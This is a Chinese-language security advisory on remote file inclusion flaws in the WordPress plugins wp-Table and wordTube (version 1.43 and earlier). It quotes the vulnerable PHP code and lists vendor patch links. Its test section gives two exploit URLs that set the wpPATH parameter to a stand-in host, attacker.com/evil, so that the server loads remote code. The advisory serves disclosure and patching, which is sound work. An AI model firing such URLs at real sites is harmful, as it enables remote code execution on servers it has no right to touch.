发布日期：2007-05-01
更新日期：2007-05-11

受影响系统：

Ruben Boelinger wp-Table for Wordpress <= 1.43
Ruben Boelinger wordTube for Wordpress <= 1.43

描述：

---

BUGTRAQ  ID: 23737
CVE(CAN) ID: CVE-2007-2482,CVE-2007-2481,CVE-2007-2483,CVE-2007-2484

WordPress是一款免费的论坛Blog系统，wp-Table和wordTube都是其中常用的插件。

WordPress的wp-Table和wordTube插件实现上存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意命令。

wordTube插件中wordtube-button.php文件没有正确验证wpPATH参数的输入，允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。漏洞代码如下：
      
----------------wordtube-button.php-------------------
...

*/
// get and set path of function

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
...
----------------------------------------------------------------

wp-Table插件的js/wptable-button.php文件中没有正确验证wpPATH参数的输入，允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。漏洞代码如下：

----------------js/wptable-button.phpp-------------------
...
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
...
----------------------------------------------------------------

成功利用这些漏洞均要求打开了register_globals。

<*来源：M.Hasran Addahroni （eufrato@gmail.com）
  
  链接：http://secunia.com/advisories/25063/
        http://secunia.com/advisories/25074/
        http://marc.info/?l=bugtraq&m=117811873318329&w=2
        http://marc.info/?l=bugtraq&m=117811836019092&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.target.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://attacker.com/evil?  
http://www.target.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://attacker.com/evil?

建议：

---

厂商补丁：

Ruben Boelinger
---------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://alexrabe.boelinger.com/?dl=wordtube.zip
http://alexrabe.boelinger.com/?dl=wp-table.zip

浏览次数：2712
严重程度：0（网友投票）